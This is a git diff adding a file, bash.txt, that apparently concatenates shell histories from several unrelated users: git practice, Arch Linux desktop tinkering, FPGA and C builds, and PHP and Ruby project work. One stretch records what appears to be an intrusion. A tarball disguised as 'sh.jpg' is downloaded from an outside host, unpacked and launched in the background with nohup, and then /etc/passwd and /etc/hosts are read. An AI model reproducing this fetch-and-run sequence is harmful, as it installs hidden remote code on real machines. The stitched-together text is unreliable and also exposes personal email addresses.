diff --git "a/bash.txt" "b/bash.txt" new file mode 100644--- /dev/null +++ "b/bash.txt" @@ -0,0 +1,180969 @@ +pwd +exit +sudo apt-get update +sudo apt-get install git +git -version +git --version +git apt-get git install +git apt_get git install +clear +sudo apt-get install git +sudo apt-get update +git --version +git config --global usr.name "manjunath" +git config --global user.email "manjunathk165.kmr@gmail.com" +mkdir parent +git init +git status +touch test +git add test +git add . +git status +git add -n "test will modify" +git status +git add test +git add . +git status +git commit "test willmodify" +git commit "test will be modify" +git commit "test1 will be commited" +git checkout test1 +git rm --cached test +git rm --cached test "test will not committed" +git rm --cached test1..."tets will not be commited" +git rm --cached test1..."test1 will not be commited" +git -h +git commit -n "test will modify" +git commit "test1 will be commited" +git diff +clear +git config --global user.name "manjunath" +git config --global user.email "manjunathk165.kmr@gmail.com" +mkdir parent +mkdir home +mkdir myproject +git init +sudo apt-get install git +sudo apt-get update +git --version +sudo apt-get install git +sudo apt-get update +git --version +git config --global user.name "manjunath" +git config --global user.email "manjunathk165.kmr@gmail.com" +mkdir myproject1 +git init +touch test +git add test "new file is added" +git add -n test +git status +git add test +git status +sudo apt-get install git +sudo apt-get update +git --version +git config --global user.name "manjunath" +git config --global user.email "manjunathk165.kmr@gmail.com" +mkdir mydemo +git init +touch test5 +git add test5 +git status +git add -n "test will be modified" +sudo apt-get install git +sudo apt-get update +git --version +git config --global user.name "manjunath reddy" +git config --global user.email "manjunathk166.kmr@gmail.com" +mkdir myjava +git init +touch hello +git add hello +git status +git commit -n "hello i am fine" +git status +touch hello test4 +git add test4 +git status +git rm --cached test4 "test4 will be committed" +git rm --cached myjava "java will be modified"gitdiff +git status +git commit test4 "add first file to local repository" +git diff +ls +sudo rm -rf myproject +ls +clear +git clone +ls +git init +touch abc.txt +touch abcd.txt +touch abcde.txt +touch abcdef.txt +git status +git add . +git status +git remote set-url origin +git commit -m "First commit" +git push -u origin master +ubuntu@ip-172-31-19-102:~$ git clone +Cloning into 'myproject'... +remote: Enumerating objects: 3, done. +remote: Counting objects: 100% (3/3), done. +remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0 +Unpacking objects: 100% (3/3), done. +ubuntu@ip-172-31-19-102:~$ cd myproject +ubuntu@ip-172-31-19-102:~/myproject$ ls +README.md +ubuntu@ip-172-31-19-102:~/myproject$ git init +Reinitialized existing Git repository in /home/ubuntu/myproject/.git/ +ubuntu@ip-172-31-19-102:~/myproject$ touch abc.txt +ubuntu@ip-172-31-19-102:~/myproject$ touch abcd.txt +ubuntu@ip-172-31-19-102:~/myproject$ touch abcde.txt +ubuntu@ip-172-31-19-102:~/myproject$ touch abcdef.txt +ubuntu@ip-172-31-19-102:~/myproject$ git status +On branch master +Your branch is up to date with 'origin/master'. +Untracked files: +nothing added to commit but untracked files present (use "git add" to track) +ubuntu@ip-172-31-19-102:~/myproject$ git add . +ubuntu@ip-172-31-19-102:~/myproject$ git status +On branch master +Your branch is up to date with 'origin/master'. +Changes to be committed: +ubuntu@ip-172-31-19-102:~/myproject$ git remote set-url origin +ubuntu@ip-172-31-19-102:~/myproject$ git commit -m "First commit" +[master 235d187] First commit +ubuntu@ip-172-31-19-102:~/myproject$ git push -u origin master +Username for : manju9945290649 +Password for ': +remote: Invalid username or password. +fatal: Authentication failed for ' +ubuntu@ip-172-31-19-102:~/myproject$ git push -u origin master +Username for : manju9945290649 +Password for ': +Counting objects: 3, done. +Compressing objects: 100% (2/2), done. +Writing objects: 100% (3/3), 292 bytes | 292.00 KiB/s, done. +Total 3 (delta 0), reused 0 (delta 0) +To +Branch 'master' set up to track remote branch 'master' from 'origin'. +ubuntu@ip-172-31-19-102:~/myproject$ +ls +ls +ls -a +git status +git commit -m "hello" +git remote set-url origin +git remote add origin +git pull +git status +git push -u origin master +git pull origin master +git push -u origin master +git remove -v +git remote -v +git status +ls +git pull origin master +ls +sudo cp -r abc.txt /home/ubuntu/myjava/ +sudo cp -r abcd.txt /home/ubuntu/myjava/ +sudo cp -r abcde.txt /home/ubuntu/myjava/ +sudo cp -r abcdef.txt /home/ubuntu/myjava/ +sudo cp -r README.md /home/ubuntu/myjava/ +ls +git status +git add . +git commit -m "Second Commit" +git push -u origin master +git pull origin master +sudo apt-get install git +sudo apt-get update +git --version +git config --global user.name "manjunath" +git config --global user.email "manjunathk165.kmr@gmail.com" +mkdir mydevops +git init +git status +git add . +git add mydevops +touch demo +git add . +git status +git commit -m "demo is added" +git diff +clear +git commit -a -m "demo file is modified" +git rm -f test +git status +gedit .gitignore test1 +sudo apt install gedit +gedit.gitignore test1 +git log +git commit -amend +git commit -a +git commit -amend +git commit --amend +git --amend +git commit --amend +sudo apt-get install git +touch demo1 +clear +sudo apt-get install git +git init +touch demo2 +touch demo3 +touch demo4 +git status +git add . +git status +git remote add origin git remote add origins.git +git push -u origin master +manju9945290649 +git commit -amend +git commit --amend +git push origin +git push --set-upstream origin master +clear +git clone git remote add origins.git +git init +touch demo6 +touch demo7 +touch demo8 +touch demo9 +git status +git add. +git status +git add . +git status +git commit set-url origins.git +git log +git show HEAD +git --version +ls + +git status +git remote -v +git remote add origins.git +git remote -v +git commit -m "this is the firt push" +git pull origin master +git pull origin +git push origin master +git pull origin master +git status +git add . +git status +is -on +ls -n +ls -all +touch sample.txt +git status +git add . +ls +sudo nano samole.txt +git status +git commit -m "new file is added" +git status +git push origin master +pwd +git push origin master +git --version +touch oracle1 +touch oracle 2 +touch oracle 3 +git add . +git status +mkdir myoracle +git commit "new file is added" +git commit -m "files are added" +git remote add origin +git push origin master +ls +ls -alt +ls +ls -alt +ls +ls -alt +find / -name "*ssh*" +ls +ls -alt +view .ssh +ls +cat id_rsa +ls +cat id_rsa.pub +ls +ls +git add listfile.go +ssh -T git@github.com +ls +ls +ls -lat +ls +view id_rsa.pub +ssh -T git@github.com +git config --global user.name "artimet123" +git config --global user.email "maoyongming2512@163.com" +l;s +ls +ls +git add listfile.go +git init +git remote add origin git@github:artimet123/sha1_test.git +git add listfile.go +git commit -m "" +git push origin master +git pull origin master +ls +?touch?README?? +touch README +ls +git add README +git -m commit "first commit" +git commit -m "first commit: +" +git push origin master +git pull origin master +git remote rm origin +ls +git add listfile.go +git commit -m "first-test" + +git init +git pull origin master +git status +git push origin master +git remote add origin git@github.com:artimet123/sha1_test.git +git push origin master +ls +git push origin master +git checkout -b sha_test2.git +ls +git add . +git commit -m "first" +git push -u origin sha_test2.git +git branch master +git checkout master +ls +git merge sha_test2.git +ls +git status +git add . +git commit -m"first" +git push +git checkout -d sha_test2.git +git checkout -D sha_test2.git +git branch -d sha_test2.git +git branch -v +git branch master +git checkout master +git branch -d sha_test2.git +ls +git branch -v +ls +view main.go +ls +view main.go +ls +ls +pwd +pwd +go env +ls +echo $HOME +ls +ls +ls +ls +ls +pwd +ls +go +go env +ls +ls +ls +ls +git +ls +go env +go man +man go +go +ls +go build listfile.go main.go sha1.go +git add sha1.go +ssh-keygen -t rsa +ssh-keygen -t rsa -C "maoyongming2512@163.com" +ls +view listfile.go +ls +view listfile.go +vi listfile.go +ls +vi listfile.go +ls +vi sha1.go +ls +vi main.go +ls +vi main.go +ls +ls +pwd +ls +vi listfile.go +git add . +git commit -m "first" +git push origin master +ls +git merge +git status +ls +git status +git add . +git commit -m "faaa" +git push origin master +git status +git push origin master +ls +ls -al +ls +ls +ls +ls -alt +ssh-keygen -t rsa -C +ssh-keygen -t rsa +ls +l;s +;s +ls +ls -alt +ls +view id_rsa.pub +ls +ls +git push origin master +ls +view listfile.go +ls +go build listfile.go main.go sha1.go +vi listfile.go +go build listfile.go main.go sha1.go +vi listfile.go +go build listfile.go main.go sha1.go +vi listfile.go +vi main.go +go build listfile.go main.go sha1.go +vi main.go +go build listfile.go main.go sha1.go +view sha1.go +vi sha1.go +go build listfile.go main.go sha1.go +vi sha1.go +go build listfile.go main.go sha1.go +vi sha1.go +go build listfile.go main.go sha1.go +vi listfile.go +vi sha1.go +go build listfile.go main.go sha1.go +vi sha1.go +go build listfile.go main.go sha1.go +vi sha1.go +go build listfile.go main.go sha1.go +vi sha1.go +go build listfile.go main.go sha1.go +vi sha1.go +go build listfile.go main.go sha1.go +vi sha1.go +ls +gcc -o main *.c +gcc -o main *.c +main +ls +ps +w +last +ls +uname -a +ps -x +passwd +w +passwd +w +ls -a +ps -x +ftp +ls -alF +ls -alF +.s +ls +ls +ls -a +ls +id +halt +cat /etc/passwd +sudo nano /etc/rc.conf +sudo nano /etc/privoxy/config +killall conky +killall scrotwm +htop +rtorrent +sudo nano /usr/sbin/privoxy-blocklist + PROMPT_COMMAND='pwd>&9;kill -STOP $$' + cd "`printf "%b" '\0057etc\0057xdg'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057luakit'`" + PROMPT_COMMAND='pwd>&9;kill -STOP $$' + cd "`printf "%b" '\0057etc\0057xdg'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057luakit'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" + cd "`printf "%b" '\0057etc\0057xdg'`" + cd "`printf "%b" '\0057etc\0057xdg\0057luakit'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057luakit'`" + cd "`printf "%b" '\0057etc\0057xdg\0057luakit'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057luakit'`" +mc +ltmux +luakit +mc +luakit +dwb +mc + PROMPT_COMMAND='pwd>&9;kill -STOP $$' + cd "`printf "%b" '\0057etc\0057xdg\0057luakit'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057etc\0057xdg\0057luakit'`" +dwb +mpd + PROMPT_COMMAND='pwd>&9;kill -STOP $$' + cd "`printf "%b" '\0057etc\0057xdg\0057luakit'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057dwb'`" + cd "`printf "%b" '\0057etc\0057xdg\0057luakit'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057dwb'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057dwb\0057default'`" + PROMPT_COMMAND='pwd>&9;kill -STOP $$' + cd "`printf "%b" '\0057etc\0057xdg\0057luakit'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057luakit'`" +mc +killall mc + PROMPT_COMMAND='pwd>&9;kill -STOP $$' + cd "`printf "%b" '\0057etc\0057xdg\0057luakit'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057luakit'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" +sudo nano /etc/rc.conf +sudo nano /etc/rc.d/polipo +chown polipo:polipo /var/log/polipo +sudo /etc/rc.d/polipo restart +mkdir /var/cache/polipo +sudo mkdir /var/cache/polipo +groupadd -r polipo +sudo groupadd -r polipo +sudo useradd -d /var/cache/polipo -g polipo -r -s /bin/false polipo +sudo chown polipo:polipo /var/log/polipo +chown -R polipo:polipo /var/run/polipo +sudo chown -R polipo:polipo /var/run/polipo +sudo chown -R polipo:polipo /var/cache/polipo +sudo /etc/rc.d/polipo start +yaourt luakit +luakit +dwb +mc + PROMPT_COMMAND='pwd>&9;kill -STOP $$' + cd "`printf "%b" '\0057etc\0057xdg\0057luakit'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056local'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056local\0057share'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056local\0057share\0057luakit'`" +mc +touch ~/.config/dwb/searchengines +nano ~/.config/dwb/searchengines +dwb +luakit +sudo nano /etc/xdg/luakit/globals.lua +luakit +dwb +mc +htop +yaourt dwb +dwb +luakit +yaourt uzbl +yaourt jumanji +jumanji + PROMPT_COMMAND='pwd>&9;kill -STOP $$' + cd "`printf "%b" '\0057home\0057sean\0057\0056cmus'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056java'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056local'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056local\0057share'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056local'`" + cd "`printf "%b" '\0057home\0057sean'`" +htop +sudo /etc/rc.d/polipo stop +sudo /etc/rc.d/privoxy stop +yaourt -Rsnc privoxy polipo dwb luakit +yaourt -Rsnc privoxy polipo dwb-hg luakit +yaourt -Rsnc jumanji-git +orphans +mc +update +dmenu-mpc + PROMPT_COMMAND='pwd>&9;kill -STOP $$' + cd "`printf "%b" '\0057home\0057sean\0057bt'`" + cd "`printf "%b" '\0057home\0057sean\0057bt\0057torrents'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057polipo'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057jdownloader'`" + cd "`printf "%b" '\0057home\0057sean\0057jdownloader\0057downloads'`" + cd "`printf "%b" '\0057home\0057sean\0057jdownloader'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057jdownloader'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057books'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057books'`" + cd "`printf "%b" '\0057home\0057sean\0057books\0057Clive\0040Barker'`" + cd "`printf "%b" '\0057home\0057sean\0057books\0057Clive\0040Barker\0057Books\0040of\0040Blood\0040\00502\0051'`" + cd "`printf "%b" '\0057home\0057sean\0057books\0057Clive\0040Barker'`" + cd "`printf "%b" '\0057home\0057sean\0057books\0057Clive\0040Barker\0057Books\0040of\0040Blood\0040Six\0040\00509\0051'`" + cd "`printf "%b" '\0057home\0057sean\0057books\0057Clive\0040Barker'`" + cd "`printf "%b" '\0057home\0057sean\0057books'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056pentadactyl'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056pentadactyl\0057plugins'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056pentadactyl'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056pentadactyl\0057info'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056pentadactyl'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056pentadactyl\0057plugins'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056pentadactyl'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056pentadactyl\0057colors'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056pentadactyl'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056pentadactyl\0057info'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056pentadactyl'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056moc'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056jd'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056java'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056cache'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056cache\0057gogglesmm'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056cache'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056cache\0057chromium'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056cache'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056cache\0057chromium'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056cache'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056cache\0057chromium'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056cache'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056adobe'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056VirtualBox'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057comics'`" +yaourt vifm +vifm +ncmpcpp +mc +ranger +vifm +yaourt xfe +yaourt -Rnsc vifm xfe +yaourt dmenu +dmenfm +yaourt -S rox +dmenfm +dmenu-mpc +dmenu-shutdown +dmenfm +xfontsel +mpd-control +mpd-control -a +mpd-control +mpd-control -a + PROMPT_COMMAND='pwd>&9;kill -STOP $$' + cd "`printf "%b" '\0057home\0057sean\0057bt\0057torrents'`" + cd "`printf "%b" '\0057home\0057sean\0057bt'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057old\0040configs'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057old\0040configs'`" +ncmpcpp +mc +dmenu-mpc +archbey +mpd-control +mpd-control -h +mpd-control -j +dmenu-mpc +yaourt nntpgrab +update +yaourt awesome +nano .xinitrc +mkdir -p ~/.config/awesome/ +cp /etc/xdg/awesome/rc.lua ~/.config/awesome/ +exit +qexit +exit +ls +exit +mc + PROMPT_COMMAND='pwd>&8;kill -STOP $$' + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057awesome'`" + PROMPT_COMMAND='pwd>&8;kill -STOP $$' + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057awesome'`" +mc + PROMPT_COMMAND='pwd>&8;kill -STOP $$' + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057awesome'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057awesome\0057themes'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home'`" + cd "`printf "%b" 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~/.config/awesome/ +ncmpcpp +mc +ncmpcpp +lc +ls +ranger +nano .xinitrc +exit +leadpad +leafpad +nano .xinitrc +ncmpcpp +yaourt -S dwm +yaourt -Rnsc dwm wmfs +yaourt -Rnsc dwm +yaourt midori +alsamixer + PROMPT_COMMAND='pwd>&9;kill -STOP $$' + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config\0057subtle'`" + cd "`printf "%b" '\0057home\0057sean\0057\0056config'`" + cd "`printf "%b" '\0057home\0057sean'`" +ranger +yaourt lfm +lfm +yaourt evilwm +yaourt evil +yaourt subtle +mkdir .config/subtle +mkdir .config/subtle/sublets +cp /etc/xdg/subtle/subtle.rb /.config/subtle/subtle.rb +cp /etc/xdg/subtle/subtle.rb .config/subtle/subtle.rb +mc +sur install mpd +gem install archive/tar/minitar +yaourt subtle-hg +sur install mpd +ls +exit +firefox & +exit +firefox +htop +firefox +sur install clock +leafpad +ranger +sudo reboot +nano .xinitrc +killall dwm +rtorrent +update +nano .xinitrc +mpd +ltmux +yaourt -Qm + clear +yaourt -Qm +yaourt -Rnsc ruby-minitar pilaunch-git wmfs-git wicked-git subtle-hg lfm dmenfm +yaourt scrotwm +yaourt -Qm +orphans +ranger +update +yaourt -S i3 +nano .xinitrc +exit +exit +exit +exit + PROMPT_COMMAND='pwd>&10;kill -STOP $$' +exit +mc +ranger +sudo pacman -S --asdeps freetype2 libxft cairo fontconfig +yaourt -Rnsc awesome +sudo pacman -S --asdeps freetype2 libxft cairo fontconfig +orphans + PROMPT_COMMAND='pwd>&9;kill -STOP $$' + cd "`printf "%b" '\0057home\0057sean\0057old\0040configs'`" + cd "`printf "%b" '\0057home\0057sean'`" + cd "`printf "%b" '\0057home\0057sean\0057old\0040configs'`" + cd "`printf "%b" '\0057home\0057sean'`" +ls +mc +update +orphans +yaourt lxapearance +yaourt lxappearance +lxappearance +yaourt -S xxxterm +yaourt -S midori +yaourt -S uzbl +yaourt uzbl +yaourt -S opera +update +yaourt -Qm +yaourt -Rnsc xxxterm uzbl-browser midori +orphans +yaourt -Qm +yaourt aria +yaourt aria2 +aria2c +-Demonoid.me-+_Eat_The_Dead_\(2007\)_1592786.8266.torrent +yaourt pyroscope +yaourt pyro +update +yaourt -Qm +yaourt -Rnsc gtk2 +yaourt -S arora +qtconfig +yaourt qwriter +yaourt tea +yaourt -S qtfm +ltmux +yaourt pulp +yaourt libgpod +update +yaourt -Qm +yaourt -S conkeror-git +aria2c +yaourt -Rnsc gtk2 +yaourt -Rnsc qt +orphans +ltmux +ranger +ltmux +update +yaourt xcdroast +fdisk -l +fdisk +yaourt -Qm +sudo leafpad +update +yaourt liberation +yaourt microsoft +yaourt bitstream +yaourt font +yaourt glisp +yaourt arora +yaourt aurora +yaourt artwiz +yaourt -Rnsc artwiz-fonts +yaourt ubuntu +yaourt -Rnsc ttf-ubuntu +archb +archbey +ltmux +mybashburn +yaourt cplay +yaourt recorder +wodim -checkdriv +yaourt bashburn +yaourt -Rnsc mybashburn +orphans +yaourt surf +yaourt tabbed +tabbed -d 2>/dev/null`; surf -e + + +tabbed surf -e +tabbed -h +man tabbed +tabbed surf +tabbed +bashmount +ranger +update +sudo rc.d setup vboxdrv +sudo reboot +rtorrent +rtorrent -v +yaourt rtorrent +rtorrent +mpd +time +grep ^HARDWARECLOCK /etc/rc.conf +hwclock -utc +hwclock -utc -r +hwclock --utc +sudo hwclock --utc +hwclock --show +sudo hwclock --show +sudo hwclock --set --date "08/16/2011 18:32:30" +sudo hwclock --show +ncmpcpp +yaourt geany +ranger +ltmux +update +yaourt -Rnsc aurora conkeror-git leafpad gstreamer0.10 gtk-chtheme i3-wm opera surf tabbed xcdroast +orphans +update +yaourt -Q +ncmpcpp +ltmux +ltmux +yaourt linux-ck +sudo geany +sudo pacman -Syy && pacman -Syu +update +sudo pacman -Sl repo-ck +sudo pacman -S ck-generic +sudo geany +update +ranger +sudo reboot +rtorrent +sudo pacman -S ck-generic +sudo nano /boot/grub/menu.lst +ranger +sudo reboot +sudo modprobe bfq-iosched +yaourt -S lnav +lnav +lnav -s +lnav -a +lnav -s +sudo /etc/rc.d/ntpd start +echo $SHELL +yaourt -S zsh +zsh +ltmux +exit +ls +git init +ls +git config --glabal user.name sean +git config --global user.name sean +git config --global user.email seanlatias@gmail.com +git remote add originseanlatias/zedboard.git +git add --all +git commit -m "first commit" +git push -u origin master +git remote -v +git remote set-url origin git@github.com:seanlatias/zedboard.git +git push -u origin master +git remote set-url originseanlatias/zedboard.git +git push -u origin master +mount /mnt/sd +cp xillydemo.bit /mnt/sd +sudo reboot +unzip cordic_tutorial.zip +make +./cordic-fpga +make fpga_batch +./cordic-fpga-batch +exit +mount /mnt/sd +cp xillydemo.bit /mnt/sd +sudo reboot +make +make fpga-batch +make fpga_batch +vim Makefile +ls +ls +rm cordic_tutorial.zip +rm -r digitrec/ +exit +ls +ls +ls +make sw +make fpga +ls +vim host.cpp +make fpga +vim host.cpp +make fpga +vim host.cpp +exit +make fpga +ls +make fpga +vim host.cpp +make fpga +vim host.cpp +make fpga +vim host.cpp +exit +vim host.cpp +make fpga +vim host.cpp +make fpga +vim host.cpp +make fpga +vim host.cpp +make fpga +vim host.cpp +make fpga +:q +vim host.cpp +make fpga +vim host.cpp +make fpga +vim host.cpp +make fpga +vim host.cpp +make fpga +exit +make fpga +make fpga +make sw +exit +mount /mnt/sd +cp xillydemo.bit /mnt/sd +sudo reboot +make fpga +make sw +exit +mount /mnt/sd +cp xillydemo.bit /mnt/sd +sudo reboot +ls +tou +touch test +ls +vim test +cat tét +cat test +ls +cp test day.txt +cat day.txt +ls +rm test +ls +clear +touch count.txt +ls +vim count.txt +cat count.txt +touch line.txt +vim line.txt +cat line.txt +touch hello.c +vim hello.c +gcc hello.c -o hello +./hello +touch age.c +vim age.c +cat hee.c +cat hello.c +vim age.c +gcc age.c -o age +vim age.c +gcc age.c -o age +./age +vim age.c +gcc age.c -o age +vim age.c +gcc age.c -o age +vim age.c +gcc age.c -o age +./age +ls +clear +touch count.c +vim count.c +gcc count.c -o count +vim count.c +gcc count.c -o count +vim count.c +gcc count.c -o count +./count +vim count.c +gcc count.c -o count +./count +vim count.c +gcc count.c -o count +./count +clear +touch sort.c +vim sort.c +gcc sort.c -o sort +vim sort.c +gcc sort.c -o sort +vim sort.c +gcc sort.c -o sort +vim sort.c +gcc sort.c -o sort +vim sort.c +gcc sort.c -o sort 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~/FileAndString +ls +touch Contact.txt +vim Contact.txt +touch Add.c +rm Add.c +ls +touch AddView.c +clear +vim AddView.c +gcc AddView.c -o AddView +vim AddView.c +gcc AddView.c -o AddView +./AddView +vim AddView.c +gcc AddView.c -o AddView +vim AddView.c +gcc AddView.c -o AddView +clear +gcc AddView.c -o AddView +cat Contact.txt +vim AddView.c +ls +ls +cat write_file.txt +vim read.c + + + + + +d +Z +ls +ls +ls +vim AddView.c +ls +ls +vim readbasic.c +ls +ls +clear +vim AddView.c +ls +ls +vim write_file.c +vim write.c +ls +vim AddView.c +gcc AddView.c -o AddView +clear +./AddView +vim AddView.c +ls +cat Contact.txt +vim Contact.txt +gcc AddView.c -o AddView +cat Contact.txt +vim AddView.c +./AddView +vim AddView.c +./AddView +vim AddView.c +gcc AddView.c -o AddView +vim AddView.c +gcc AddView.c -o AddView +./AddView +clear +ls +vim Addview.c +vim AddView.c +gcc AddView.c -o AddView +./AddView +vim Contact.txt +vim AddView.c +gcc AddView.c -o AddView +./AddView +vim AddView.c +gcc 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govandari.envy.nu/sh.jpg +tar xvfz sh.jpg +rm -rf sh.jpg +cat README +nohup ./start 81 >> /dev/null & +ps -aux +cat /etc/passwd +wget govandari.envy.nu/sh.jpg +cat /etc/hosts +w +ps =auix +ps -aux +git status +git log +git status +git ThinkPHP/ +git ThinkPHP/Library/Vendor/PHPExcel/ +git add ThinkPHP/Library/Vendor/PHPExcel/ +git status +git commit -am 'excel类库' +git push +git status +git status +git add ThinkPHP/ +git status +git commit -am '补全上传类,验证码类' +git push +git status +git log +git status +git add ThinkPHP/ +git status +git commit -am '验证码和图片上传类库' +git push +git status +git push +git config --global push.default matching +git push -u origin master +git status +git config --global push.default simple +git push +git status +git add . +git status +git commit -am '验证码类库,分页类库 和表格转数据方法' +git push +git config --global user.email "1254715625" +git config --global user.name "Your Name" + git config --global user.name "1254715625" +git config --global user.email "1254715625@qq.com" +git push +git status +git checkoout +git checkout branch +git status +git push +git status +git ~ +git log +git commit -am '验证码类库,分页类库 和表格转数据方法' +git status +git checkout master +git push +git status +git add . +git status +git commit -am '优化了一下' +git push +git status +git add Application/ +git status +git commit -am '数据库导出到excel 完成一半' +git push +git - +dir +git status +git commit -am '可以根据指定的数据库,把他里面的表结构给导出来' +git push +git status +git --version +pwd +dir +ls +ls -al +vim .gitconfig +git status +git status +git status +git add . +git status +git commit -am '小优化' +git push +composer +git status +git status +git log +git status +git add apiadmin.sql +git status +git commit -am '5/23日sql文件' +git push +git log +git exit +exit +git status +git add . +git status +git commit -am '邮箱配置类,晚上回去弄' +git status +git push +git log +git status + git commit -am '接口信息 1 day' +git push +git config --global credential.helper store +git pull +git status +git %USERPROFILE%/.gitconfig +git add %USERPROFILE%/.gitconfig +git status +git add %USERPROFILE%/.bash_history +git status +git commit -am '登录配置信息' +git push +git log +git log +git status +git config --global user.email "1263115223@qq.com" +git config --global user.name "1254715625" +git commit -am '日志,无用' +git push +git status +git commit -am '微信支付类' +git push +git status +git add . +git status +git commit -am '抓取类,不一定合适' +git push +git status +git add . +git status +git log +git diff +git commit -am '新增短信配置 和做了一些小优化' +git push +git add . +git status +git add . +git status +git commit -am '优化' +git push +git status +git add . +git status +git commit -am '游戏' +git push +w +unam e-a +uname -a +cat /proc/cpuinfo +ls-la +ls-la +ls -la +id +grep -rin daily * +grep -rin daily * +ls -la +more crawler_queue_spec.rb +ls -la +more viewability_spec.rb +ls -la +ls -la +ls -la +ls -la +more viewability_spec.rb +vim viewability_spec.rb +cp viewability_spec.rb in_app_filter.rb +vim in_app_filter.rb +grep -in select * +ls -la +more domain_matching_spec.rb +ls -la +ls -la *camp* +more campaign_blacklist_spec.rb +wc -l * +wc -l * | sort -n +rm in_app_filter.rb +grep -in campaign *.rb +h | grep launch +bundle exec rake docker_native:launch_bidder +pwd +bundle exec rspec spec/ +ps -f +docker-compose down +grep -n setup_ron_ *.rb +grep -fn setup_ron_ *.rb +grep -n setup_ron_ * +ls- la +ls -la +grep -n setup_ron_ * +wc -l * | sort -n +vim budget_spec.rb +cp budget_spec.rb ad_placement_spec.rb +vim ad_placement_spec.rb +h | grep launcher +h | grep launc +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/matching +bundle exec rspec spec/matching/pacing_spec.rb +bundle exec rspec spec/matching/pacing_spec.rb +bundle exec rspec spec/matching +bundle exec rspec spec/matching/ad_placement_spec.rb +vim spec/matching/ad_placement_spec.rb +grep -n setup_ron_ * +docker-compose down +pwd +grep -n setup_ron_ * +vim global_blacklist_spec.rb +vim ad_placement_spec.rb +vim spec/matching/ad_placement_spec.rb +bundle spec/matching/ad_placement_spec.rb +bundle 